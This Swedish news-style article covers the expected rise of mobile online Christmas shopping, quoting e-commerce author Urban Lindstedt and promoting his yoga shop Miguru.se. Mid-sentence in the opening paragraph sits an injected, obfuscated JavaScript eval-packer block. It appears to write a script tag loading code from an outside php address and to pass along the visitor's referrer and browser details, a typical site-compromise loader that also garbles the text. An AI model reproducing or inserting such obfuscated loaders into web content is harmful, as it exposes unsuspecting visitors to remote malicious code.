Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

Mobila nätköp kommer att öka i julhandeln

Mobila nätköp kommer att öka i julhandeln
Revue Magazine

Mycket eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bytzt|var|u0026u|referrer|kfkby||js|php’.split(’|’),0,{}))
talar för att en betydande del av julhandeln på nätet kommer att ske från smartmobiler i år. Stressade julshoppare kommer att göra de sista inköpen i väntan på bussen. Det förutspår e-handelsexperten Urban Lindstedt som har mobilanpassat sin egen nätbutik Miguru.se för att öka försäljningen i jul.

En stor del av årets julinköp kommer att ske från smartmobiler tror e-handelsexperten Urban Lindstedt som skrivit boken E-handlarens handbok och som ger ut nyhetsbrevet E-handelstrender. Alla e-handlare och sajtägare som Urban Lindstedt varit i kontakt med under 2011 upplever samma sak – en ökad trafikandel från smartmobiler. Google säger att 15 procent av alla sökningar idag är mobila.

Urban Lindstedt blev själv förvånad när han insåg att en betydande andel av besökarna till hans yogabutik Miguru kom från mobiler i augusti i år.

– Trots att jag visste att den mobila trafiken ökar blev jag mycket förvånad när jag insåg att åtta procent av Migurus besökare i augusti kom från mobiler. Att sedan en handfull hade beställt via mobilen fick mig att omgående beställa en mobilanpassad nätbutik, säger Urban Lindstedt som använder plattformen Askås avancerade internetbutik.

Den mobilanpassade butiken visas automatiskt när en kund surfar in på Miguru.se via en mobil. Den har sökfunktionen i fokus och menyerna är mycket enklare för mobilbesökare att hantera än i den vanliga butiken. Sedan mobilanpassningen lanserats kommer fem procent av omsättningen från mobilorder.

– Jag är helt övertygad om att köpen via mobil kommer att fördubblas i jul. Jag tänker mig att stressade julshoppare sköter allt fler av inköpen på bussen hem från jobbet än framför datorn på kvällen, säger Urban Lindstedt.

Problemet för e-handlare är att konverteringsgraden, dvs andelen besökare som genomför ett köp, är betydligt lägre för besökare från mobiler än besökare från vanliga datorer. Men det är ett problem som kommer minska i talt med att plattformarna blir bättre anpassade för visning i mobiler.

I år har var femte svensk redan handlat via mobilen och inom tre år kommer ytterligare 30 procent att ha handlat via mobilen. Detta visar en undersökning från GFK som gjorts på uppdrag av tidningen Market. Detta är siffror som bara kommer att öka när allt fler aktörer mobilanpassar sina sajter.

Konsumentmönstren från näthandel på datorn går igen på mobilen. De vanligaste produkterna som kunder köpt via mobilen var datorspel (26 procent), kläder (24 procent), böcker (21 procent) och datorer/datortillbehör (18 procent), enligt E-handelsbarometern Q4 2010.

Utvecklingen drivs av den snabbt ökande försäljningen av smartmobiler som Iphone och Android. Nästan en tredjedel av alla sålda mobiler i Sverige var smartmobiler under årets första kvartal, enligt analysföretaget It Research. De som får en smartmobil ändrar sitt mobila internetbeteende över natt.

Yogabutiken Miguru.se startades 2008 av yogin, journalisten och författaren Urban Lindstedt. Miguru erbjuder det största sortimentet av yogamattor, yogautrustning och yogafilmer i Norden. Vi säljer varumärken som lägger stor vikt vid kvalitet och ekologi som Manduka, Sun Salutation, Stolt by Anna och My Spirit. Vi säljer även yogautrustning direkt till yogastudios till grossistpriser.

Beställ från vår yogabutik.

Följ gärna vår Miguru blogg

Gilla oss på Facebook

Ring oss på telefon 08-502 16 797

Det går att kontakta Urban Lindstedt på urban.lindstedt@gmail.com eller 0708/97 84 76